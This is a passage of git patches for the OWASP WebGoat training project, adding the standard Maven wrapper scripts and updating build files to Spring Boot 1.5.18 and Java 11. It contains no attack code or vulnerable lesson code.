+cygwin=false; +darwin=false; +mingw=false +case "`uname`" in + CYGWIN*) cygwin=true ;; + MINGW*) mingw=true;; + Darwin*) darwin=true + # Use /usr/libexec/java_home if available, otherwise fall back to /Library/Java/Home + # See https://developer.apple.com/library/mac/qa/qa1170/_index.html + if [ -z "$JAVA_HOME" ]; then + if [ -x "/usr/libexec/java_home" ]; then + export JAVA_HOME="`/usr/libexec/java_home`" + else + export JAVA_HOME="/Library/Java/Home" + fi + fi + ;; +esac + +if [ -z "$JAVA_HOME" ] ; then + if [ -r /etc/gentoo-release ] ; then + JAVA_HOME=`java-config --jre-home` + fi +fi + +if [ -z "$M2_HOME" ] ; then + ## resolve links - $0 may be a link to maven's home + PRG="$0" + + # need this for relative symlinks + while [ -h "$PRG" ] ; do + ls=`ls -ld "$PRG"` + link=`expr "$ls" : '.*-> \(.*\)$'` + if expr "$link" : '/.*' > /dev/null; then + PRG="$link" + else + PRG="`dirname "$PRG"`/$link" + fi + done + + saveddir=`pwd` + + M2_HOME=`dirname "$PRG"`/.. + + # make it fully qualified + M2_HOME=`cd "$M2_HOME" && pwd` + + cd "$saveddir" + # echo Using m2 at $M2_HOME +fi + +# For Cygwin, ensure paths are in UNIX format before anything is touched +if $cygwin ; then + [ -n "$M2_HOME" ] && + M2_HOME=`cygpath --unix "$M2_HOME"` + [ -n "$JAVA_HOME" ] && + JAVA_HOME=`cygpath --unix "$JAVA_HOME"` + [ -n "$CLASSPATH" ] && + CLASSPATH=`cygpath --path --unix "$CLASSPATH"` +fi + +# For Mingw, ensure paths are in UNIX format before anything is touched +if $mingw ; then + [ -n "$M2_HOME" ] && + M2_HOME="`(cd "$M2_HOME"; pwd)`" + [ -n "$JAVA_HOME" ] && + JAVA_HOME="`(cd "$JAVA_HOME"; pwd)`" + # TODO classpath? +fi + +if [ -z "$JAVA_HOME" ]; then + javaExecutable="`which javac`" + if [ -n "$javaExecutable" ] && ! [ "`expr \"$javaExecutable\" : '\([^ ]*\)'`" = "no" ]; then + # readlink(1) is not available as standard on Solaris 10. + readLink=`which readlink` + if [ ! 
`expr "$readLink" : '\([^ ]*\)'` = "no" ]; then + if $darwin ; then + javaHome="`dirname \"$javaExecutable\"`" + javaExecutable="`cd \"$javaHome\" && pwd -P`/javac" + else + javaExecutable="`readlink -f \"$javaExecutable\"`" + fi + javaHome="`dirname \"$javaExecutable\"`" + javaHome=`expr "$javaHome" : '\(.*\)/bin'` + JAVA_HOME="$javaHome" + export JAVA_HOME + fi + fi +fi + +if [ -z "$JAVACMD" ] ; then + if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD="$JAVA_HOME/jre/sh/java" + else + JAVACMD="$JAVA_HOME/bin/java" + fi + else + JAVACMD="`which java`" + fi +fi + +if [ ! -x "$JAVACMD" ] ; then + echo "Error: JAVA_HOME is not defined correctly." >&2 + echo " We cannot execute $JAVACMD" >&2 + exit 1 +fi + +if [ -z "$JAVA_HOME" ] ; then + echo "Warning: JAVA_HOME environment variable is not set." +fi + +CLASSWORLDS_LAUNCHER=org.codehaus.plexus.classworlds.launcher.Launcher + +# traverses directory structure from process work directory to filesystem root +# first directory with .mvn subdirectory is considered project base directory +find_maven_basedir() { + + if [ -z "$1" ] + then + echo "Path not specified to find_maven_basedir" + return 1 + fi + + basedir="$1" + wdir="$1" + while [ "$wdir" != '/' ] ; do + if [ -d "$wdir"/.mvn ] ; then + basedir=$wdir + break + fi + # workaround for JBEAP-8937 (on Solaris 10/Sparc) + if [ -d "${wdir}" ]; then + wdir=`cd "$wdir/.."; pwd` + fi + # end of workaround + done + echo "${basedir}" +} + +# concatenates all lines of a file +concat_lines() { + if [ -f "$1" ]; then + echo "$(tr -s '\n' ' ' < "$1")" + fi +} + +BASE_DIR=`find_maven_basedir "$(pwd)"` +if [ -z "$BASE_DIR" ]; then + exit 1; +fi + +########################################################################################## +# Extension to allow automatically downloading the maven-wrapper.jar from Maven-central +# This allows using the maven wrapper in projects that prohibit 
checking in binary data. +########################################################################################## +if [ -r "$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" ]; then + if [ "$MVNW_VERBOSE" = true ]; then + echo "Found .mvn/wrapper/maven-wrapper.jar" + fi +else + if [ "$MVNW_VERBOSE" = true ]; then + echo "Couldn't find .mvn/wrapper/maven-wrapper.jar, downloading it ..." + fi + jarUrl="https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.4.2/maven-wrapper-0.4.2.jar" + while IFS="=" read key value; do + case "$key" in (wrapperUrl) jarUrl="$value"; break ;; + esac + done < "$BASE_DIR/.mvn/wrapper/maven-wrapper.properties" + if [ "$MVNW_VERBOSE" = true ]; then + echo "Downloading from: $jarUrl" + fi + wrapperJarPath="$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" + + if command -v wget > /dev/null; then + if [ "$MVNW_VERBOSE" = true ]; then + echo "Found wget ... using wget" + fi + wget "$jarUrl" -O "$wrapperJarPath" + elif command -v curl > /dev/null; then + if [ "$MVNW_VERBOSE" = true ]; then + echo "Found curl ... using curl" + fi + curl -o "$wrapperJarPath" "$jarUrl" + else + if [ "$MVNW_VERBOSE" = true ]; then + echo "Falling back to using Java to download" + fi + javaClass="$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.java" + if [ -e "$javaClass" ]; then + if [ ! -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then + if [ "$MVNW_VERBOSE" = true ]; then + echo " - Compiling MavenWrapperDownloader.java ..." + fi + # Compiling the Java class + ("$JAVA_HOME/bin/javac" "$javaClass") + fi + if [ -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then + # Running the downloader + if [ "$MVNW_VERBOSE" = true ]; then + echo " - Running MavenWrapperDownloader.java ..." 
+ fi + ("$JAVA_HOME/bin/java" -cp .mvn/wrapper MavenWrapperDownloader "$MAVEN_PROJECTBASEDIR") + fi + fi + fi +fi +########################################################################################## +# End of extension +########################################################################################## + +export MAVEN_PROJECTBASEDIR=${MAVEN_BASEDIR:-"$BASE_DIR"} +if [ "$MVNW_VERBOSE" = true ]; then + echo $MAVEN_PROJECTBASEDIR +fi +MAVEN_OPTS="$(concat_lines "$MAVEN_PROJECTBASEDIR/.mvn/jvm.config") $MAVEN_OPTS" + +# For Cygwin, switch paths to Windows format before running java +if $cygwin; then + [ -n "$M2_HOME" ] && + M2_HOME=`cygpath --path --windows "$M2_HOME"` + [ -n "$JAVA_HOME" ] && + JAVA_HOME=`cygpath --path --windows "$JAVA_HOME"` + [ -n "$CLASSPATH" ] && + CLASSPATH=`cygpath --path --windows "$CLASSPATH"` + [ -n "$MAVEN_PROJECTBASEDIR" ] && + MAVEN_PROJECTBASEDIR=`cygpath --path --windows "$MAVEN_PROJECTBASEDIR"` +fi + +WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain + +exec "$JAVACMD" \ + $MAVEN_OPTS \ + -classpath "$MAVEN_PROJECTBASEDIR/.mvn/wrapper/maven-wrapper.jar" \ + "-Dmaven.home=${M2_HOME}" "-Dmaven.multiModuleProjectDirectory=${MAVEN_PROJECTBASEDIR}" \ + ${WRAPPER_LAUNCHER} $MAVEN_CONFIG "$@" diff --git a/mvnw.cmd b/mvnw.cmd new file mode 100644 index 000000000..e5cfb0ae9 --- /dev/null +++ b/mvnw.cmd 
@@ -0,0 +1,161 @@ +@REM ---------------------------------------------------------------------------- +@REM Licensed to the Apache Software Foundation (ASF) under one +@REM or more contributor license agreements. See the NOTICE file +@REM distributed with this work for additional information +@REM regarding copyright ownership. The ASF licenses this file +@REM to you under the Apache License, Version 2.0 (the +@REM "License"); you may not use this file except in compliance +@REM with the License. You may obtain a copy of the License at +@REM +@REM http://www.apache.org/licenses/LICENSE-2.0 +@REM +@REM Unless required by applicable law or agreed to in writing, +@REM software distributed under the License is distributed on an +@REM "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +@REM KIND, either express or implied. See the License for the +@REM specific language governing permissions and limitations +@REM under the License. +@REM ---------------------------------------------------------------------------- + +@REM ---------------------------------------------------------------------------- +@REM Maven2 Start Up Batch script +@REM +@REM Required ENV vars: +@REM JAVA_HOME - location of a JDK home dir +@REM +@REM Optional ENV vars +@REM M2_HOME - location of maven2's installed home dir +@REM MAVEN_BATCH_ECHO - set to 'on' to enable the echoing of the batch commands +@REM MAVEN_BATCH_PAUSE - set to 'on' to wait for a key stroke before ending +@REM MAVEN_OPTS - parameters passed to the Java VM when running Maven +@REM e.g. 
to debug Maven itself, use +@REM set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000 +@REM MAVEN_SKIP_RC - flag to disable loading of mavenrc files +@REM ---------------------------------------------------------------------------- + +@REM Begin all REM lines with '@' in case MAVEN_BATCH_ECHO is 'on' +@echo off +@REM set title of command window +title %0 +@REM enable echoing my setting MAVEN_BATCH_ECHO to 'on' +@if "%MAVEN_BATCH_ECHO%" == "on" echo %MAVEN_BATCH_ECHO% + +@REM set %HOME% to equivalent of $HOME +if "%HOME%" == "" (set "HOME=%HOMEDRIVE%%HOMEPATH%") + +@REM Execute a user defined script before this one +if not "%MAVEN_SKIP_RC%" == "" goto skipRcPre +@REM check for pre script, once with legacy .bat ending and once with .cmd ending +if exist "%HOME%\mavenrc_pre.bat" call "%HOME%\mavenrc_pre.bat" +if exist "%HOME%\mavenrc_pre.cmd" call "%HOME%\mavenrc_pre.cmd" +:skipRcPre + +@setlocal + +set ERROR_CODE=0 + +@REM To isolate internal variables from possible post scripts, we use another setlocal +@setlocal + +@REM ==== START VALIDATION ==== +if not "%JAVA_HOME%" == "" goto OkJHome + +echo. +echo Error: JAVA_HOME not found in your environment. >&2 +echo Please set the JAVA_HOME variable in your environment to match the >&2 +echo location of your Java installation. >&2 +echo. +goto error + +:OkJHome +if exist "%JAVA_HOME%\bin\java.exe" goto init + +echo. +echo Error: JAVA_HOME is set to an invalid directory. >&2 +echo JAVA_HOME = "%JAVA_HOME%" >&2 +echo Please set the JAVA_HOME variable in your environment to match the >&2 +echo location of your Java installation. >&2 +echo. +goto error + +@REM ==== END VALIDATION ==== + +:init + +@REM Find the project base dir, i.e. the directory that contains the folder ".mvn". +@REM Fallback to current working directory if not found. 
+ +set MAVEN_PROJECTBASEDIR=%MAVEN_BASEDIR% +IF NOT "%MAVEN_PROJECTBASEDIR%"=="" goto endDetectBaseDir + +set EXEC_DIR=%CD% +set WDIR=%EXEC_DIR% +:findBaseDir +IF EXIST "%WDIR%"\.mvn goto baseDirFound +cd .. +IF "%WDIR%"=="%CD%" goto baseDirNotFound +set WDIR=%CD% +goto findBaseDir + +:baseDirFound +set MAVEN_PROJECTBASEDIR=%WDIR% +cd "%EXEC_DIR%" +goto endDetectBaseDir + +:baseDirNotFound +set MAVEN_PROJECTBASEDIR=%EXEC_DIR% +cd "%EXEC_DIR%" + +:endDetectBaseDir + +IF NOT EXIST "%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config" goto endReadAdditionalConfig + +@setlocal EnableExtensions EnableDelayedExpansion +for /F "usebackq delims=" %%a in ("%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config") do set JVM_CONFIG_MAVEN_PROPS=!JVM_CONFIG_MAVEN_PROPS! %%a +@endlocal & set JVM_CONFIG_MAVEN_PROPS=%JVM_CONFIG_MAVEN_PROPS% + +:endReadAdditionalConfig + +SET MAVEN_JAVA_EXE="%JAVA_HOME%\bin\java.exe" +set WRAPPER_JAR="%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.jar" +set WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain + +set DOWNLOAD_URL="https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.4.2/maven-wrapper-0.4.2.jar" +FOR /F "tokens=1,2 delims==" %%A IN (%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.properties) DO ( + IF "%%A"=="wrapperUrl" SET DOWNLOAD_URL=%%B +) + +@REM Extension to allow automatically downloading the maven-wrapper.jar from Maven-central +@REM This allows using the maven wrapper in projects that prohibit checking in binary data. +if exist %WRAPPER_JAR% ( + echo Found %WRAPPER_JAR% +) else ( + echo Couldn't find %WRAPPER_JAR%, downloading it ... 
+ echo Downloading from: %DOWNLOAD_URL% + powershell -Command "(New-Object Net.WebClient).DownloadFile('%DOWNLOAD_URL%', '%WRAPPER_JAR%')" + echo Finished downloading %WRAPPER_JAR% +) +@REM End of extension + +%MAVEN_JAVA_EXE% %JVM_CONFIG_MAVEN_PROPS% %MAVEN_OPTS% %MAVEN_DEBUG_OPTS% -classpath %WRAPPER_JAR% "-Dmaven.multiModuleProjectDirectory=%MAVEN_PROJECTBASEDIR%" %WRAPPER_LAUNCHER% %MAVEN_CONFIG% %* +if ERRORLEVEL 1 goto error +goto end + +:error +set ERROR_CODE=1 + +:end +@endlocal & set ERROR_CODE=%ERROR_CODE% + +if not "%MAVEN_SKIP_RC%" == "" goto skipRcPost +@REM check for post script, once with legacy .bat ending and once with .cmd ending +if exist "%HOME%\mavenrc_post.bat" call "%HOME%\mavenrc_post.bat" +if exist "%HOME%\mavenrc_post.cmd" call "%HOME%\mavenrc_post.cmd" +:skipRcPost + +@REM pause the script if MAVEN_BATCH_PAUSE is set to 'on' +if "%MAVEN_BATCH_PAUSE%" == "on" pause + +if "%MAVEN_TERMINATE_CMD%" == "on" exit %ERROR_CODE% + +exit /B %ERROR_CODE% From ec225558b9d62fab16410e7491446f3d3e64199e Mon Sep 17 00:00:00 2001 
From: Nanne Baars Date: Sat, 15 Dec 2018 13:59:54 +0100 Subject: [PATCH 19/28] Move to latest Spring Boot version and move to Java 11 --- pom.xml | 143 +++--------------- webgoat-container/pom.xml | 14 +- webgoat-lessons/auth-bypass/pom.xml | 2 +- webgoat-lessons/bypass-restrictions/pom.xml | 2 +- webgoat-lessons/challenge/pom.xml | 2 +- webgoat-lessons/client-side-filtering/pom.xml | 2 +- webgoat-lessons/cross-site-scripting/pom.xml | 2 +- webgoat-lessons/csrf/pom.xml | 2 +- webgoat-lessons/html-tampering/pom.xml | 2 +- webgoat-lessons/http-basics/pom.xml | 2 +- webgoat-lessons/http-proxies/pom.xml | 2 +- webgoat-lessons/idor/pom.xml | 2 +- .../insecure-deserialization/pom.xml | 2 +- webgoat-lessons/insecure-login/pom.xml | 2 +- webgoat-lessons/jwt/pom.xml | 2 +- webgoat-lessons/missing-function-ac/pom.xml | 2 +- .../java/org/owasp/webgoat/plugin/Users.java | 4 - webgoat-lessons/password-reset/pom.xml | 2 +- webgoat-lessons/pom.xml | 4 +- webgoat-lessons/sql-injection/pom.xml | 2 +- webgoat-lessons/vulnerable-components/pom.xml | 2 +- webgoat-lessons/webgoat-introduction/pom.xml | 2 +- webgoat-lessons/webwolf-introduction/pom.xml | 2 +- webgoat-lessons/xxe/pom.xml | 7 +- webgoat-server/pom.xml | 14 +- webwolf/pom.xml | 10 +- 26 files changed, 67 insertions(+), 167 deletions(-) diff --git a/pom.xml b/pom.xml index 206ecb2ed..bf6e77a90 100644 --- a/pom.xml +++ b/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat webgoat-parent pom - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT WebGoat Parent Pom Parent Pom for the WebGoat Project. A deliberately insecure Web Application @@ -21,7 +21,7 @@ org.springframework.boot spring-boot-starter-parent - 1.5.12.RELEASE + 1.5.18.RELEASE @@ -107,9 +107,6 @@ - 1.8 - 1.8 - UTF-8 UTF-8 @@ -129,7 +126,7 @@ 2.1 0.5 1.3.1 - 2.4 + 2.6 3.4 4.0.0 2.2.5 
@@ -141,30 +138,25 @@ 2.6.3 2.6.3 6.0 - 1.2 + 1.3 1.7.12 1.3.1 4.12 + 1.18.4 1.5.4 - 3.3 - 2.19 + 3.8.0 + 2.22.0 1.6 2.6 2.10.4 2.5.2 3.0.1 - 2.19 + 2.22.0 1.6.6 2.11.7 2.1.20 2.48.2 3.2.4.RELEASE - 1.1.2 - 3.0.5 - 7.0.65 - 2.3-SNAPSHOT - 3.5.1 - 1.6.3 @@ -200,105 +192,12 @@ - - - release - - - org.owasp.webgoat.lesson - dist - 1.0 - zip - provided - plugins - - - - - - org.apache.maven.plugins - maven-dependency-plugin - - - unpack-lesson - - unpack-dependencies - - generate-resources - - - ${project.basedir}/webgoat-container/src/main/webapp/plugin_lessons - - dist - *.jar - - - - - - org.sonatype.plugins - nexus-staging-maven-plugin - ${nexus-staging-maven-plugin.version} - true - - ossrh - https://oss.sonatype.org/ - false - - - - org.apache.maven.plugins - maven-source-plugin - ${maven-source-plugin.version} - - - attach-sources - - jar-no-fork - - - - - - org.apache.maven.plugins - maven-javadoc-plugin - ${maven-javadoc-plugin.version} - - - attach-javadocs - - jar - - - - - - org.apache.maven.plugins - maven-gpg-plugin - ${maven-gpg-plugin.version} - - - sign-artifacts - verify - - sign - - - WebGoat - - - - - - - - - org.projectlombok lombok provided + ${lombok.version} true @@ -306,10 +205,25 @@ commons-exec 1.3 + + javax.xml.bind + jaxb-api + 2.3.0 + + + org.apache.maven.plugins + maven-compiler-plugin + ${maven-compiler-plugin.version} + + 11 + 11 + UTF-8 + + org.apache.maven.plugins maven-release-plugin @@ -342,15 +256,6 @@ true - - com.versioneye - versioneye-maven-plugin - ${versioneye-maven-plugin.version} - - a1e4a9da4ed34ee44cab - 562da95be346d7000e0369ac - - diff --git a/webgoat-container/pom.xml b/webgoat-container/pom.xml index 11edb880f..2f766037a 100644 --- a/webgoat-container/pom.xml +++ b/webgoat-container/pom.xml @@ -10,7 +10,7 @@ org.owasp.webgoat webgoat-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT 
@@ -64,16 +64,6 @@ false - - org.apache.maven.plugins - maven-compiler-plugin - ${maven-compiler-plugin.version} - - 1.8 - 1.8 - ISO-8859-1 - - org.apache.maven.plugins maven-surefire-plugin @@ -191,7 +181,9 @@ junit ${junit.version} jar + test + diff --git a/webgoat-lessons/auth-bypass/pom.xml b/webgoat-lessons/auth-bypass/pom.xml index 6e63139a2..0cdc9ef49 100644 --- a/webgoat-lessons/auth-bypass/pom.xml +++ b/webgoat-lessons/auth-bypass/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/bypass-restrictions/pom.xml b/webgoat-lessons/bypass-restrictions/pom.xml index 29f56754c..c1d0102c0 100755 --- a/webgoat-lessons/bypass-restrictions/pom.xml +++ b/webgoat-lessons/bypass-restrictions/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/challenge/pom.xml b/webgoat-lessons/challenge/pom.xml index b8f9144c9..f4a321fd7 100644 --- a/webgoat-lessons/challenge/pom.xml +++ b/webgoat-lessons/challenge/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/client-side-filtering/pom.xml b/webgoat-lessons/client-side-filtering/pom.xml index 485e42b76..aa1d49872 100644 --- a/webgoat-lessons/client-side-filtering/pom.xml +++ b/webgoat-lessons/client-side-filtering/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/cross-site-scripting/pom.xml b/webgoat-lessons/cross-site-scripting/pom.xml index b8c1021ff..6c99401b6 100644 --- a/webgoat-lessons/cross-site-scripting/pom.xml +++ b/webgoat-lessons/cross-site-scripting/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/csrf/pom.xml b/webgoat-lessons/csrf/pom.xml index cc8d429c5..2366e85d3 100644 
--- a/webgoat-lessons/csrf/pom.xml +++ b/webgoat-lessons/csrf/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/html-tampering/pom.xml b/webgoat-lessons/html-tampering/pom.xml index 2c7fe60c0..2585104ca 100755 --- a/webgoat-lessons/html-tampering/pom.xml +++ b/webgoat-lessons/html-tampering/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/http-basics/pom.xml b/webgoat-lessons/http-basics/pom.xml index 9fdf8d13b..4a2e3959b 100644 --- a/webgoat-lessons/http-basics/pom.xml +++ b/webgoat-lessons/http-basics/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/http-proxies/pom.xml b/webgoat-lessons/http-proxies/pom.xml index a78c58090..23c24a5dd 100644 --- a/webgoat-lessons/http-proxies/pom.xml +++ b/webgoat-lessons/http-proxies/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/idor/pom.xml b/webgoat-lessons/idor/pom.xml index 6620f6920..73e18fbaa 100644 --- a/webgoat-lessons/idor/pom.xml +++ b/webgoat-lessons/idor/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/insecure-deserialization/pom.xml b/webgoat-lessons/insecure-deserialization/pom.xml index 68a95c885..08de6cf6a 100755 --- a/webgoat-lessons/insecure-deserialization/pom.xml +++ b/webgoat-lessons/insecure-deserialization/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/insecure-login/pom.xml b/webgoat-lessons/insecure-login/pom.xml index ed6bd358e..faf241a51 100755 --- a/webgoat-lessons/insecure-login/pom.xml 
+++ b/webgoat-lessons/insecure-login/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/jwt/pom.xml b/webgoat-lessons/jwt/pom.xml index ec6861190..e1856384d 100644 --- a/webgoat-lessons/jwt/pom.xml +++ b/webgoat-lessons/jwt/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/missing-function-ac/pom.xml b/webgoat-lessons/missing-function-ac/pom.xml index 8b266b4c2..7c2359247 100644 --- a/webgoat-lessons/missing-function-ac/pom.xml +++ b/webgoat-lessons/missing-function-ac/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/plugin/Users.java b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/plugin/Users.java index 9b01ac3d5..29be436b7 100644 --- a/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/plugin/Users.java +++ b/webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat/plugin/Users.java @@ -1,6 +1,5 @@ package org.owasp.webgoat.plugin; -import com.sun.org.apache.xpath.internal.axes.HasPositionalPredChecker; import org.owasp.webgoat.assignments.Endpoint; import org.owasp.webgoat.session.DatabaseUtilities; import org.owasp.webgoat.session.UserSessionData; @@ -13,9 +12,6 @@ import org.springframework.web.bind.annotation.ResponseBody; import javax.servlet.http.HttpServletRequest; import java.sql.*; import java.util.HashMap; -import java.util.Map; - -import static javax.swing.UIManager.getString; public class Users extends Endpoint{ diff --git a/webgoat-lessons/password-reset/pom.xml b/webgoat-lessons/password-reset/pom.xml index 5e78f3b0e..37c437ce9 100644 --- a/webgoat-lessons/password-reset/pom.xml +++ b/webgoat-lessons/password-reset/pom.xml 
@@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/pom.xml b/webgoat-lessons/pom.xml index e5f66efdf..c6d9f8b75 100644 --- a/webgoat-lessons/pom.xml +++ b/webgoat-lessons/pom.xml @@ -5,12 +5,12 @@ org.owasp.webgoat.lesson webgoat-lessons-parent pom - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT org.owasp.webgoat webgoat-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/sql-injection/pom.xml b/webgoat-lessons/sql-injection/pom.xml index 46677291d..d2e50488c 100644 --- a/webgoat-lessons/sql-injection/pom.xml +++ b/webgoat-lessons/sql-injection/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/vulnerable-components/pom.xml b/webgoat-lessons/vulnerable-components/pom.xml index df1c57c62..22411f819 100644 --- a/webgoat-lessons/vulnerable-components/pom.xml +++ b/webgoat-lessons/vulnerable-components/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT diff --git a/webgoat-lessons/webgoat-introduction/pom.xml b/webgoat-lessons/webgoat-introduction/pom.xml index d4e2db171..5e6d2ce7f 100644 --- a/webgoat-lessons/webgoat-introduction/pom.xml +++ b/webgoat-lessons/webgoat-introduction/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/webwolf-introduction/pom.xml b/webgoat-lessons/webwolf-introduction/pom.xml index 22745b96a..a268b0602 100644 --- a/webgoat-lessons/webwolf-introduction/pom.xml +++ b/webgoat-lessons/webwolf-introduction/pom.xml @@ -6,6 +6,6 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT \ No newline at end of file diff --git a/webgoat-lessons/xxe/pom.xml b/webgoat-lessons/xxe/pom.xml index 781f2cc36..6d69be448 100644 --- a/webgoat-lessons/xxe/pom.xml 
+++ b/webgoat-lessons/xxe/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat.lesson webgoat-lessons-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT @@ -15,6 +15,11 @@ commons-lang 2.6 + + org.glassfish.jaxb + jaxb-runtime + 2.3.0 + com.github.tomakehurst diff --git a/webgoat-server/pom.xml b/webgoat-server/pom.xml index af9f6c6c1..31a304e2f 100644 --- a/webgoat-server/pom.xml +++ b/webgoat-server/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat webgoat-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT @@ -203,11 +203,13 @@ - - org.springframework.boot - spring-boot-devtools - true - + + + + + + + org.postgresql postgresql diff --git a/webwolf/pom.xml b/webwolf/pom.xml index bc2d30f0a..bb748e427 100644 --- a/webwolf/pom.xml +++ b/webwolf/pom.xml @@ -6,7 +6,7 @@ org.owasp.webgoat webgoat-parent - v8.0.0.SNAPSHOT + v8.0.0-SNAPSHOT @@ -26,7 +26,7 @@ commons-io commons-io - LATEST + ${commons-io.version} org.springframework.boot @@ -103,9 +103,9 @@ maven-compiler-plugin ${maven-compiler-plugin.version} - 1.8 - 1.8 - ISO-8859-1 + 11 + 11 + UTF-8 From 3fa10c4b102577144f134abfb74a7a661c403328 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Tue, 15 Jan 2019 16:23:03 +0100 Subject: [PATCH 20/28] Update to Java 11 --- README.MD | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.MD b/README.MD index 238f9231f..fd7831eb5 100644 --- a/README.MD +++ b/README.MD @@ -69,7 +69,7 @@ Using the `docker-compose` file will simplify getting WebGoat and WebWolf up and ### Prerequisites: -* Java 8 +* Java 11 * Maven > 3.2.1 * Your favorite IDE * Git, or Git support in your IDE From 959a3c64206db5ea43531b854638d52a0ad15670 Mon Sep 17 00:00:00 2001 From: Nanne Baars Date: Tue, 15 Jan 2019 16:23:21 +0100 Subject: [PATCH 21/28] Docker images should use new jar version notation --- webgoat-server/Dockerfile | 4 ++-- webwolf/Dockerfile | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/webgoat-server/Dockerfile b/webgoat-server/Dockerfile index c5b43c961..74d0cd4ae 100644 
